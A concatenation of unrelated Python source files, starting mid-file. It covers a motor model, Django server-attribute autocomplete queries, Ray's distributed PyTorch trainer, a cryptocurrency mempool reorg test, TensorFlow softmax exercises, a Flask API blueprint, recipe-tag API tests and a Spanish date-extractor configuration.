r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limits_agenda = {
'u': self._default_limits['u'],
'i': self._limits['u'] / (r_a + self._motor_parameter['r_e']),
}
super()._update_limits(limits_agenda)
def get_state_space(self, input_currents, input_voltages):
# Docstring of superclass
lower_limit = 0
low = {
'omega': 0,
'torque': 0,
'i': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i': 1,
'u': 1,
}
return low, high
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([[-(mp['r_a'] + mp['r_e'] + mp['l_e_prime'] * omega) / (
mp['l_a'] + mp['l_e'])]]),
np.array([-mp['l_e_prime'] * state[self.I_IDX] / (
mp['l_a'] + mp['l_e'])]),
np.array([2 * mp['l_e_prime'] * state[self.I_IDX]])
)
|
from django.db import connection, ProgrammingError
from serveradmin.serverdb.models import Attribute, ServerAttribute, Server
from django.core.exceptions import ObjectDoesNotExist
def attribute_startswith(search_string, limit=20):
"""Query attributes starting search_string
:param search_string: e.g. al to match allow_from, allow_to etc.
:param limit: limit result to n results
:return:
"""
query = Attribute.objects.filter(
attribute_id__startswith=search_string).only('attribute_id').order_by(
'attribute_id')
attributes = [attribute.attribute_id for attribute in query[:limit]]
for attribute in Attribute.specials.keys():
if attribute.startswith(search_string):
attributes.append(attribute)
return sorted(attributes[:limit])
def attribute_value_startswith(attribute_id, search_string, limit=20):
"""Query attribute for values starting with search string
:param attribute_id: e.g. servertype or primary_ip6
:param search_string: e.g. 2a00:
:param limit: limit result to n results
:return:
"""
if attribute_id in Attribute.specials.keys():
return _specials_value_startswith(attribute_id, search_string, limit)
else:
return _value_startswith(attribute_id, search_string, limit)
def _specials_value_startswith(attribute_id, search_string, limit=20):
"""Query attribute specials starting with search_string
:param attribute_id: e.g. servertype
:param search_string: e.g. v
:param limit: limit result to n results
:return:
"""
column_name = Attribute.specials[attribute_id].special.field
with connection.cursor() as cursor:
        # This is safe because column_name comes from us
sql = "SELECT DISTINCT {} FROM server WHERE {} LIKE %s ORDER BY {} ASC LIMIT {}".format(
column_name, column_name, column_name, limit)
# This MUST be escaped to prevent SQL injection
try:
cursor.execute(sql, [search_string + '%'])
return [row[0] for row in cursor.fetchall()]
except ProgrammingError:
# Invalid attribute name or type like intran_ip
return []
def _value_startswith(attribute_id, search_string, limit=20):
"""Query attribute starting with search_string
:param attribute_id: e.g. primary_ip6
:param search_string: e.g. 2a00
:param limit: e.g. limit result to n results
:return:
"""
query_attribute = Attribute.objects.filter(attribute_id=attribute_id)
if not query_attribute:
return []
attribute = query_attribute.first()
attribute_model = ServerAttribute.get_model(attribute.type)
if attribute.type == 'reverse':
# Should not be queried by client but lets be sure.
return []
if attribute.type == 'relation':
query = Server.objects.filter(servertype_id=attribute_id).filter(
hostname__startswith=search_string).only('hostname').order_by(
'hostname')
return [server.hostname for server in query[:limit]]
if attribute.type == 'boolean':
return ['true', 'false']
query = attribute_model.objects.filter(attribute_id=attribute_id).filter(
value__startswith=search_string).only('value').distinct(
'value').order_by('value')
return [attr.value for attr in query[:limit]]
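# Illustrative calls (attribute names and inputs come from the docstrings above; results are assumed):
#   attribute_startswith('al')                    -> e.g. ['allow_from', 'allow_to']
#   attribute_value_startswith('servertype', 'v') -> servertype values starting with 'v'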
|
import numpy as np
import os
import logging
import numbers
import tempfile
import time
import torch
import torch.distributed as dist
import ray
from ray.tune import Trainable
from ray.tune.trial import Resources
from ray.util.sgd.pytorch.distributed_pytorch_runner import (
DistributedPyTorchRunner)
from ray.util.sgd import utils
from ray.util.sgd.pytorch.pytorch_runner import PyTorchRunner
from ray.util.sgd.pytorch.constants import VALID_SCHEDULER_STEP
logger = logging.getLogger(__name__)
RESIZE_COOLDOWN_S = 10
def _validate_scheduler_step_freq(scheduler_step_freq):
if scheduler_step_freq:
if scheduler_step_freq not in VALID_SCHEDULER_STEP:
raise ValueError(
"Scheduler step freq must be in {}. Got {}".format(
VALID_SCHEDULER_STEP, scheduler_step_freq))
class PyTorchTrainer:
"""Train a PyTorch model using distributed PyTorch.
Launches a set of actors which connect via distributed PyTorch and
coordinate gradient updates to train the provided model.
.. code-block:: python
def model_creator(config):
return nn.Linear(1, 1)
def optimizer_creator(model, config):
return torch.optim.SGD(
model.parameters(), lr=config.get("lr", 1e-4))
def data_creator(config):
return LinearDataset(2, 5), LinearDataset(2, 5, size=400)
trainer = PyTorchTrainer(
model_creator,
data_creator,
optimizer_creator,
loss_creator=nn.MSELoss,
use_gpu=True
)
for i in range(4):
trainer.train()
Args:
model_creator (dict -> Model(s)): Constructor function that takes in
config and returns the model(s) to be optimized. These must be
``torch.nn.Module`` objects. If multiple models are returned,
a ``training_operator_cls`` must be specified. You do not need to
handle GPU/devices in this function; RaySGD will do that under
the hood.
data_creator (dict -> Dataset(s)): Constructor function
that takes in the passed config and returns one or
two ``torch.utils.data.Dataset`` objects.
Note that even though two Dataset objects can be returned,
only one dataset will be used for training. RaySGD
will automatically wrap the objects with a ``DataLoader``.
optimizer_creator ((models, dict) -> optimizers): Constructor
function that takes in the return values from
``model_creator`` and the passed config and returns One or
more Torch optimizer objects. You do not need to handle
GPU/devices in this function; ``RaySGD`` will do that for you.
loss_creator (torch.nn.*Loss class | dict -> loss): A constructor
function for the training loss. This can be either a function that
takes in the provided config for customization or a subclass
of ``torch.nn.modules.loss._Loss``, which is most Pytorch
loss classes. For example, ``loss_creator=torch.nn.BCELoss``.
        scheduler_creator ((optimizers, dict) -> scheduler(s)):
A constructor function for the torch scheduler. This is
a function that takes in the generated optimizers (from
``optimizer_creator``) provided config for customization.
Be sure to set ``scheduler_step_freq`` to increment the
scheduler correctly.
training_operator_cls (type): Custom training operator class
that subclasses the TrainingOperator class. This class
will be copied onto all remote workers and used to specify
custom training and validation operations. Defaults to
TrainingOperator.
config (dict): Custom configuration value to be passed to
all creator and operator constructors.
dataloader_config (dict): Configuration values to be passed into
the ``torch.utils.data.DataLoader`` object that wraps
the dataset on each parallel worker for both training
and validation. Note that if ``num_replicas``
is greater than 1, ``shuffle`` and ``sampler`` will be
automatically set. See the available arguments
here https://pytorch.org/docs/stable/data.html.
num_replicas (int): the number of workers used in distributed
training.
use_gpu (bool): Sets resource allocation for workers to 1 GPU
if true, and automatically moves both the model and optimizer
to the available CUDA device.
batch_size (int): Total batch size for each minibatch. This
value is divided among all workers and rounded.
backend (string): backend used by distributed PyTorch. Currently
support "nccl", "gloo", and "auto". If "auto", RaySGD will
automatically use "nccl" if `use_gpu` is True, and "gloo"
otherwise.
use_fp16 (bool): Enables mixed precision training via apex if apex
is installed. This is automatically done after the model and
optimizers are constructed and will work for multi-model training.
Please see https://github.com/NVIDIA/apex for more details.
apex_args (dict|None): Dict containing keyword args for amp.initialize.
See https://nvidia.github.io/apex/amp.html#module-apex.amp. By
default, the models and optimizers are passed in. Consider using
"num_losses" if operating over multiple models and optimizers.
scheduler_step_freq: "batch", "epoch", or None. This will
determine when ``scheduler.step`` is called. If "batch",
``step`` will be called after every optimizer step. If "epoch",
``step`` will be called after one pass of the DataLoader.
"""
def __init__(self,
model_creator,
data_creator,
optimizer_creator,
loss_creator,
scheduler_creator=None,
training_operator_cls=None,
initialization_hook=None,
config=None,
dataloader_config=None,
num_replicas=1,
use_gpu=False,
batch_size=16,
backend="auto",
use_fp16=False,
apex_args=None,
scheduler_step_freq="batch"):
if num_replicas > 1 and not dist.is_available():
raise ValueError(
("Distributed PyTorch is not supported on macOS. "
"To run without distributed PyTorch, set 'num_replicas=1'. "
"For more information, see "
"https://github.com/pytorch/examples/issues/467."))
self.model_creator = model_creator
self.data_creator = data_creator
self.optimizer_creator = optimizer_creator
self.loss_creator = loss_creator
self.scheduler_creator = scheduler_creator
self.training_operator_cls = training_operator_cls
self.initialization_hook = initialization_hook
self.config = {} if config is None else config
self.dataloader_config = dataloader_config
self.optimizer_timer = utils.TimerStat(window_size=1)
if backend == "auto":
backend = "nccl" if use_gpu else "gloo"
logger.info("Using {} as backend.".format(backend))
self.backend = backend
# TODO: Have an auto "use_gpu" option to detect and use GPUs.
self.use_gpu = use_gpu
self.batch_size = batch_size
self.max_replicas = num_replicas
self.use_fp16 = use_fp16
if apex_args and not isinstance(apex_args, dict):
raise ValueError("apex_args needs to be a dict object.")
self.apex_args = apex_args
self.temp_dir = tempfile.mkdtemp(prefix="raysgd")
self._num_failures = 0
self._last_resize = float("-inf")
_validate_scheduler_step_freq(scheduler_step_freq)
self.scheduler_step_freq = scheduler_step_freq
self._start_workers(self.max_replicas)
def _start_workers(self, num_replicas):
logger.info(f"start_workers: Setting %d replicas." % num_replicas)
if num_replicas == 1:
# Generate actor class
Runner = ray.remote(
num_cpus=1, num_gpus=int(self.use_gpu))(PyTorchRunner)
# Start workers
self.workers = [
Runner.remote(
self.model_creator,
self.data_creator,
self.optimizer_creator,
self.loss_creator,
self.scheduler_creator,
training_operator_cls=self.training_operator_cls,
config=self.config,
dataloader_config=self.dataloader_config,
batch_size=self.batch_size,
use_fp16=self.use_fp16,
apex_args=self.apex_args,
scheduler_step_freq=self.scheduler_step_freq,
)
]
if self.initialization_hook:
self.apply_all_workers(self.initialization_hook)
# Get setup tasks in order to throw errors on failure
ray.get(self.workers[0].setup.remote())
else:
# Generate actor class
Runner = ray.remote(
num_cpus=1,
num_gpus=int(self.use_gpu))(DistributedPyTorchRunner)
# Compute batch size per replica
batch_size_per_replica = self.batch_size // num_replicas
if self.batch_size % num_replicas > 0:
new_batch_size = batch_size_per_replica * num_replicas
logger.warning(
("Changing batch size from {old_batch_size} to "
"{new_batch_size} to evenly distribute batches across "
"{num_replicas} replicas.").format(
old_batch_size=self.batch_size,
new_batch_size=new_batch_size,
num_replicas=num_replicas))
# Start workers
self.workers = [
Runner.remote(
self.model_creator,
self.data_creator,
self.optimizer_creator,
self.loss_creator,
self.scheduler_creator,
backend=self.backend,
training_operator_cls=self.training_operator_cls,
config=self.config,
dataloader_config=self.dataloader_config,
batch_size=batch_size_per_replica,
use_fp16=self.use_fp16,
apex_args=self.apex_args,
scheduler_step_freq=self.scheduler_step_freq)
for i in range(num_replicas)
]
if self.initialization_hook:
self.apply_all_workers(self.initialization_hook)
# Compute URL for initializing distributed PyTorch
ip = ray.get(self.workers[0].get_node_ip.remote())
port = ray.get(self.workers[0].find_free_port.remote())
address = "tcp://{ip}:{port}".format(ip=ip, port=port)
# Get setup tasks in order to throw errors on failure
ray.get([
worker.setup.remote(address, i, len(self.workers))
for i, worker in enumerate(self.workers)
])
def train(self,
num_steps=None,
max_retries=0,
checkpoint="auto",
info=None):
"""Runs a training epoch.
Averages the values returned from all workers. Set
`max_retries` to enable fault handling in case of instance preemption.
Args:
num_steps (int): Number of batches to compute update steps on.
This also corresponds to the number of times
``TrainingOperator.train_batch`` is called.
max_retries (int): Must be non-negative. If set to N, will
kill all current workers, query the Ray global state for
total available resources, and re-launch up to the
available resources. Behavior is not well-defined
in case of shared cluster usage.
checkpoint (str): Path to checkpoint to restore from if retrying.
If max_retries is set and ``checkpoint == "auto"``,
PyTorchTrainer will save a checkpoint before starting to train.
info (dict): Optional dictionary passed to the training
operator for ``train_epoch`` and ``train_batch``.
Returns:
A dictionary of metrics for training.
You can provide custom metrics by passing in a custom
``training_operator_cls``.
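Example (hypothetical usage, assuming ``trainer`` was constructed as
described above):
    stats = trainer.train(max_retries=3, checkpoint="auto")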
"""
assert max_retries >= 0, "`max_retries` must be non-negative."
if max_retries:
if checkpoint == "auto":
logger.debug("Retrying detected. Automatically checkpointing.")
checkpoint = self.save(
os.path.join(self.temp_dir, "tmp_checkpoint"))
elif not checkpoint:
raise ValueError("Cannot retry from empty checkpoint.")
if checkpoint and self._should_resize():
logger.info("Resize opportunity detected. Attempting to scale up.")
self._resize_workers(checkpoint=checkpoint)
with self.optimizer_timer:
success, worker_stats = self._train_epoch(
num_steps=num_steps, info=info)
# Fault handling
for i in range(max_retries):
if success:
break
else:
self._num_failures += 1
self._resize_workers(checkpoint=checkpoint)
logger.info("Retrying training step with %d workers." % len(
self.workers))
success, worker_stats = self._train_epoch(
num_steps=num_steps, info=info)
if not success:
raise RuntimeError("Training run failed.")
worker_stats = ray.get(worker_stats)
train_stats = {}
for stat_key in worker_stats[0]:
if isinstance(worker_stats[0][stat_key], numbers.Number):
train_stats[stat_key] = np.nanmean(
[s.get(stat_key, np.nan) for s in worker_stats])
else:
train_stats[stat_key] = worker_stats[0][stat_key]
return train_stats
def _train_epoch(self, num_steps=None, info=None):
worker_stats = [
w.train_epoch.remote(num_steps=num_steps, info=info)
for w in self.workers
]
success = utils.check_for_failure(worker_stats)
return success, worker_stats
def apply_all_workers(self, fn):
"""Run a function on all operators on the workers.
Args:
fn (Callable): A function that takes in no arguments.
Returns:
A list of objects returned by ``fn`` on each worker.
"""
return ray.get([w.apply.remote(fn) for w in self.workers])
def apply_all_operators(self, fn):
"""Run a function on all operators on the workers.
Args:
fn (Callable[TrainingOperator]): A function that takes in a
TrainingOperator.
Returns:
A list of objects returned by ``fn`` on each operator.
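Example (hypothetical usage; assumes schedulers were created via
``scheduler_creator``):
    scheduler_states = trainer.apply_all_operators(
        lambda op: [sched.state_dict() for sched in op.schedulers])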
"""
return ray.get([w.apply_operator.remote(fn) for w in self.workers])
def validate(self, num_steps=None, info=None):
"""Evaluates the model on the validation data set.
Args:
num_steps (int): Number of batches to compute update steps on.
This also corresponds to the number of times
``TrainingOperator.validate_batch`` is called.
info (dict): Optional dictionary passed to the training
operator for `validate` and `validate_batch`.
Returns:
A dictionary of metrics for validation.
You can provide custom metrics by passing in a custom
``training_operator_cls``.
"""
worker_stats = ray.get([
w.validate.remote(num_steps=num_steps, info=info)
for w in self.workers
])
validation_stats = {}
for stat_key in worker_stats[0]:
validation_stats[stat_key] = np.nanmean(
[s.get(stat_key, np.nan) for s in worker_stats])
return validation_stats
def update_scheduler(self, metric):
"""Calls ``scheduler.step(metric)`` on all schedulers.
This is useful for lr_schedulers such as ``ReduceLROnPlateau``.
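Example (hypothetical usage; assumes the validation stats expose a
``mean_loss`` key):
    val_stats = trainer.validate()
    trainer.update_scheduler(metric=val_stats["mean_loss"])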
"""
self.apply_all_operators(
lambda op: [sched.step(metric) for sched in op.schedulers])
def get_model(self):
"""Returns the learned model(s)."""
models = self.model_creator(self.config)
state = ray.get(self.workers[0].get_state.remote())
if len(state["models"]) == 1:
models.load_state_dict(state["models"][0])
else:
for model, state_dict in zip(models, state["models"]):
model.load_state_dict(state_dict)
return models
def save(self, checkpoint):
"""Saves the model(s) to the provided checkpoint.
Args:
checkpoint (str): Path to target checkpoint file.
Returns:
checkpoint (str): Path to target checkpoint file.
"""
state = ray.get(self.workers[0].get_state.remote())
torch.save(state, checkpoint)
return checkpoint
def restore(self, checkpoint):
"""Restores the Trainer and all workers from the provided checkpoint.
Args:
checkpoint (str): Path to target checkpoint file.
"""
state = torch.load(checkpoint)
state_id = ray.put(state)
ray.get([worker.set_state.remote(state_id) for worker in self.workers])
def shutdown(self, force=False):
"""Shuts down workers and releases resources."""
if not force:
cleanup = [worker.shutdown.remote() for worker in self.workers]
ray.get(cleanup)
[worker.__ray_terminate__.remote() for worker in self.workers]
else:
for worker in self.workers:
logger.warning("Killing worker {}.".format(worker))
worker.__ray_kill__()
self.workers = []
def _resize_workers(self, checkpoint, max_retries=10):
# check available resources
self.shutdown(force=True)
assert checkpoint, "Cannot restore without checkpoint."
time.sleep(1)
for i in range(max_retries):
resources = ray.available_resources()
new_workers = min(resources.get("CPU", 0), self.max_replicas)
if self.use_gpu:
new_workers = min(resources.get("GPU", 0), new_workers)
if new_workers:
self._last_resize = time.time()
self._start_workers(int(new_workers))
self.restore(checkpoint)
return
else:
delay = 2**i
logger.info("Resources: {}".format(resources))
logger.warning(
"No new workers found. Retrying in %d sec." % delay)
time.sleep(delay)
raise RuntimeError("Exceeded max_retries for relaunching workers.")
def _should_resize(self):
"""Returns True if past cooldown and exists resources to scale up."""
worker_gap = self.max_replicas - len(self.workers)
past_cooldown = (time.time() - self._last_resize) > RESIZE_COOLDOWN_S
if past_cooldown and worker_gap:
resources = ray.available_resources()
potential_workers = min(resources.get("CPU", 0), self.max_replicas)
if self.use_gpu:
potential_workers = min(
resources.get("GPU", 0), potential_workers)
return potential_workers > 0
return False
class PyTorchTrainable(Trainable):
@classmethod
def default_resource_request(cls, config):
return Resources(
cpu=0,
gpu=0,
extra_cpu=config["num_replicas"],
extra_gpu=int(config["use_gpu"]) * config["num_replicas"])
def _setup(self, config):
self._trainer = PyTorchTrainer(**config)
def _train(self):
train_stats = self._trainer.train()
validation_stats = self._trainer.validate()
train_stats.update(validation_stats)
# output {"mean_loss": test_loss, "mean_accuracy": accuracy}
return train_stats
def _save(self, checkpoint_dir):
return self._trainer.save(os.path.join(checkpoint_dir, "model.pth"))
def _restore(self, checkpoint_path):
return self._trainer.restore(checkpoint_path)
def _stop(self):
self._trainer.shutdown()
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mempool re-org scenarios.
Test re-org scenarios with a mempool that contains transactions
that spend (directly or indirectly) coinbase transactions.
"""
from test_framework.blocktools import create_raw_transaction
from test_framework.test_framework import GrailumTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class MempoolCoinbaseTest(GrailumTestFramework):
def set_test_params(self):
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
alert_filename = None # Set by setup_network
def run_test(self):
# Start with a 200 block chain
assert_equal(self.nodes[0].getblockcount(), 200)
# Mine four blocks. After this, nodes[0] blocks
# 101, 102, and 103 are spend-able.
new_blocks = self.nodes[1].generate(4)
self.sync_all()
node0_address = self.nodes[0].getnewaddress()
node1_address = self.nodes[1].getnewaddress()
# Three scenarios for re-orging coinbase spends in the memory pool:
# 1. Direct coinbase spend : spend_101
# 2. Indirect (coinbase spend in chain, child in mempool) : spend_102 and spend_102_1
# 3. Indirect (coinbase and child both in chain) : spend_103 and spend_103_1
# Use invalidateblock to make all of the above coinbase spends invalid (immature coinbase),
# and make sure the mempool code behaves correctly.
b = [ self.nodes[0].getblockhash(n) for n in range(101, 105) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spend_101_raw = create_raw_transaction(self.nodes[0], coinbase_txids[1], node1_address, amount=49.99)
spend_102_raw = create_raw_transaction(self.nodes[0], coinbase_txids[2], node0_address, amount=49.99)
spend_103_raw = create_raw_transaction(self.nodes[0], coinbase_txids[3], node0_address, amount=49.99)
# Create a transaction which is time-locked to two blocks in the future
timelock_tx = self.nodes[0].createrawtransaction([{"txid": coinbase_txids[0], "vout": 0}], {node0_address: 49.99})
# Set the time lock
timelock_tx = timelock_tx.replace("ffffffff", "11111191", 1)
timelock_tx = timelock_tx[:-8] + hex(self.nodes[0].getblockcount() + 2)[2:] + "000000"
timelock_tx = self.nodes[0].signrawtransactionwithwallet(timelock_tx)["hex"]
# This will raise an exception because the timelock transaction is too immature to spend
assert_raises_rpc_error(-26, "non-final", self.nodes[0].sendrawtransaction, timelock_tx)
# Broadcast and mine spend_102 and 103:
spend_102_id = self.nodes[0].sendrawtransaction(spend_102_raw)
spend_103_id = self.nodes[0].sendrawtransaction(spend_103_raw)
self.nodes[0].generate(1)
# Time-locked transaction is still too immature to spend
assert_raises_rpc_error(-26, 'non-final', self.nodes[0].sendrawtransaction, timelock_tx)
# Create 102_1 and 103_1:
spend_102_1_raw = create_raw_transaction(self.nodes[0], spend_102_id, node1_address, amount=49.98)
spend_103_1_raw = create_raw_transaction(self.nodes[0], spend_103_id, node1_address, amount=49.98)
# Broadcast and mine 103_1:
spend_103_1_id = self.nodes[0].sendrawtransaction(spend_103_1_raw)
last_block = self.nodes[0].generate(1)
# Time-locked transaction can now be spent
timelock_tx_id = self.nodes[0].sendrawtransaction(timelock_tx)
# ... now put spend_101 and spend_102_1 in memory pools:
spend_101_id = self.nodes[0].sendrawtransaction(spend_101_raw)
spend_102_1_id = self.nodes[0].sendrawtransaction(spend_102_1_raw)
self.sync_all()
assert_equal(set(self.nodes[0].getrawmempool()), {spend_101_id, spend_102_1_id, timelock_tx_id})
for node in self.nodes:
node.invalidateblock(last_block[0])
# Time-locked transaction is now too immature and has been removed from the mempool
# spend_103_1 has been re-orged out of the chain and is back in the mempool
assert_equal(set(self.nodes[0].getrawmempool()), {spend_101_id, spend_102_1_id, spend_103_1_id})
# Use invalidateblock to re-org back and make all those coinbase spends
# immature/invalid:
for node in self.nodes:
node.invalidateblock(new_blocks[0])
self.sync_all()
# mempool should be empty.
assert_equal(set(self.nodes[0].getrawmempool()), set())
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
import numpy as np
import tensorflow as tf
from utils.general_utils import test_all_close
def softmax(x):
"""
Compute the softmax function in tensorflow.
You might find the tensorflow functions tf.exp, tf.reduce_max,
tf.reduce_sum, tf.expand_dims useful. (Many solutions are possible, so you may
not need to use all of these functions). Recall also that many common
tensorflow operations are sugared (e.g. x * y does a tensor multiplication
if x and y are both tensors). Make sure to implement the numerical stability
fixes as in the previous homework!
Args:
x: tf.Tensor with shape (n_samples, n_features). Note feature vectors are
represented by row-vectors. (For simplicity, no need to handle 1-d
input as in the previous homework)
Returns:
out: tf.Tensor with shape (n_sample, n_features). You need to construct this
tensor in this problem.
"""
### YOUR CODE HERE
x_max=tf.reduce_max(x,1,keep_dims=True) # find row-wise maximums
x=tf.subtract(x,x_max) # subtract x_max
x_exp=tf.exp(x) # exponentiation
sum_exp=tf.reduce_sum(x_exp,1,keep_dims=True) # sum
out=tf.div(x_exp,sum_exp)
### END YOUR CODE
return out
def cross_entropy_loss(y, yhat):
"""
Compute the cross entropy loss in tensorflow.
The loss should be summed over the current minibatch.
y is a one-hot tensor of shape (n_samples, n_classes) and yhat is a tensor
of shape (n_samples, n_classes). y should be of dtype tf.int32, and yhat should
be of dtype tf.float32.
The functions tf.to_float, tf.reduce_sum, and tf.log might prove useful. (Many
solutions are possible, so you may not need to use all of these functions).
Note: You are NOT allowed to use the tensorflow built-in cross-entropy
functions.
Args:
y: tf.Tensor with shape (n_samples, n_classes). One-hot encoded.
yhat: tf.Tensor with shape (n_sample, n_classes). Each row encodes a
probability distribution and should sum to 1.
Returns:
out: tf.Tensor with shape (1,) (Scalar output). You need to construct this
tensor in the problem.
"""
### YOUR CODE HERE
product=tf.multiply(tf.to_float(y),tf.log(yhat))
out=tf.negative(tf.reduce_sum(product))
### END YOUR CODE
return out
def test_softmax_basic():
"""
Some simple tests of softmax to get you started.
Warning: these are not exhaustive.
"""
test1 = softmax(tf.constant(np.array([[1001, 1002], [3, 4]]), dtype=tf.float32))
with tf.Session() as sess:
test1 = sess.run(test1)
test_all_close("Softmax test 1", test1, np.array([[0.26894142, 0.73105858],
[0.26894142, 0.73105858]]))
test2 = softmax(tf.constant(np.array([[-1001, -1002]]), dtype=tf.float32))
with tf.Session() as sess:
test2 = sess.run(test2)
test_all_close("Softmax test 2", test2, np.array([[0.73105858, 0.26894142]]))
print("Basic (non-exhaustive) softmax tests pass\n")
def test_cross_entropy_loss_basic():
"""
Some simple tests of cross_entropy_loss to get you started.
Warning: these are not exhaustive.
"""
y = np.array([[0, 1], [1, 0], [1, 0]])
yhat = np.array([[.5, .5], [.5, .5], [.5, .5]])
test1 = cross_entropy_loss(
tf.constant(y, dtype=tf.int32),
tf.constant(yhat, dtype=tf.float32))
with tf.Session() as sess:
test1 = sess.run(test1)
expected = -3 * np.log(.5)
test_all_close("Cross-entropy test 1", test1, expected)
print("Basic (non-exhaustive) cross-entropy tests pass")
if __name__ == "__main__":
test_softmax_basic()
test_cross_entropy_loss_basic()
|
# Copyright 2021 Ismael Lugo <ismael.lugo@deloe.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from flask import Blueprint
from flask import g
from flask_wtf.csrf import CSRFError
bp_api = Blueprint('api_v1', __name__, url_prefix='/api/v1')
@bp_api.after_request
def auto_api_json(response):
if not g.get('no_json', False):
try:
data = json.loads(response.get_data())
except json.decoder.JSONDecodeError:
pass
else:
data['success'] = 'errors' not in data
response.data = json.dumps(data)
return response
@bp_api.errorhandler(CSRFError)
def handle_csrf_error(e) -> dict:
return dict(errors={'csrf': e.description})
__all__ = ['bp_api']
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag, Recipe
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTests(TestCase):
"""Test that publicly available tags API"""
def setUp(self) -> None:
self.client = APIClient()
def test_login_required(self):
"""Test that login is required to retrieve tags"""
response = self.client.get(TAGS_URL)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Test the authorized user tags API"""
def setUp(self) -> None:
self.user = get_user_model().objects.create_user(
'test@londonappdev.com',
'password123'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='Vegan')
Tag.objects.create(user=self.user, name='Dessert')
response = self.client.get(TAGS_URL)
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, serializer.data)
def test_tags_limited_to_user(self):
"""Test that tags returned are for the authenticated user"""
user2 = get_user_model().objects.create_user(
'other@londonappdev.com',
'testpass123'
)
Tag.objects.create(user=user2, name='Fruity')
tag = Tag.objects.create(user=self.user, name='Comfort Food')
response = self.client.get(TAGS_URL)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data),1)
self.assertEqual(response.data[0]['name'],tag.name)
def test_create_tag_successful(self):
"""Test creating a new tag"""
payload = {'name': 'Test tag'}
self.client.post(TAGS_URL, payload)
exists = Tag.objects.filter(
user=self.user,
name = payload['name']
).exists()
self.assertTrue(exists)
def test_create_tag_invalid(self):
"""Test to create a tag with invalid payload"""
payload = {'name': ''}
response = self.client.post(TAGS_URL, payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_tags_assigned_to_recipes(self):
"""Test filtering tags by those assigned in the recipes"""
tag1 = Tag.objects.create(user=self.user, name='Breakfast')
tag2 = Tag.objects.create(user=self.user, name='Lunch')
recipe = Recipe.objects.create(
title='Coriander eggs on toasts',
time_minutes=10,
price=5.0,
user=self.user
)
recipe.tags.add(tag1)
response = self.client.get(TAGS_URL, {'assigned_only': 1})
serializer1 = TagSerializer(tag1)
serializer2 = TagSerializer(tag2)
self.assertIn(serializer1, response.data)
self.assertNotIn(serializer2, response.data)
def test_retrieve_tags_assigned_unique(self):
"""Test filtering tags by assigned returns unique items"""
tag = Tag.objects.create(user=self.user, name='Breakfast')
Tag.objects.create(user=self.user, name='Lunch')
recipe1 = Recipe.objects.create(
title='Pancakes',
time_minutes=5,
price=3.00,
user=self.user
)
recipe1.tags.add(tag)
recipe2 = Recipe.objects.create(
title='Porridge',
time_minutes=3,
price=2.00,
user=self.user
)
recipe2.tags.add(tag)
response = self.client.get(TAGS_URL, {'assigned_only': 1})
self.assertEqual(len(response.data),1)
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from typing import Pattern, List, Dict
from recognizers_number import (BaseNumberExtractor, BaseNumberParser,
SpanishOrdinalExtractor, SpanishIntegerExtractor, SpanishNumberParserConfiguration)
from recognizers_text.utilities import RegExpUtility
from ...resources.spanish_date_time import SpanishDateTime
from ..extractors import DateTimeExtractor
from ..base_duration import BaseDurationExtractor
from ..base_date import DateExtractorConfiguration
from ..utilities import DateTimeUtilityConfiguration
from .duration_extractor_config import SpanishDurationExtractorConfiguration
from .base_configs import SpanishDateTimeUtilityConfiguration
from ..constants import Constants
from ...resources.base_date_time import BaseDateTime
class SpanishDateExtractorConfiguration(DateExtractorConfiguration):
@property
def week_day_start(self) -> Pattern:
return self._week_day_start
@property
def check_both_before_after(self) -> bool:
return self._check_both_before_after
@property
def date_regex_list(self) -> List[Pattern]:
return self._date_regex_list
@property
def implicit_date_list(self) -> List[Pattern]:
return self._implicit_date_list
@property
def month_end(self) -> Pattern:
return self._month_end
@property
def week_day_end(self) -> Pattern:
return self._week_day_end
@property
def of_month(self) -> Pattern:
return self._of_month
@property
def date_unit_regex(self) -> Pattern:
return self._date_unit_regex
@property
def for_the_regex(self) -> Pattern:
return self._for_the_regex
@property
def week_day_and_day_of_month_regex(self) -> Pattern:
return self._week_day_and_day_of_month_regex
@property
def relative_month_regex(self) -> Pattern:
return self._relative_month_regex
@property
def week_day_regex(self) -> Pattern:
return self._week_day_regex
@property
def prefix_article_regex(self) -> Pattern:
return self._prefix_article_regex
@property
def day_of_week(self) -> Dict[str, int]:
return self._day_of_week
@property
def month_of_year(self) -> Dict[str, int]:
return self._month_of_year
@property
def ordinal_extractor(self) -> BaseNumberExtractor:
return self._ordinal_extractor
@property
def integer_extractor(self) -> BaseNumberExtractor:
return self._integer_extractor
@property
def number_parser(self) -> BaseNumberParser:
return self._number_parser
@property
def duration_extractor(self) -> DateTimeExtractor:
return self._duration_extractor
@property
def strict_relative_regex(self) -> Pattern:
return self._strict_relative_regex
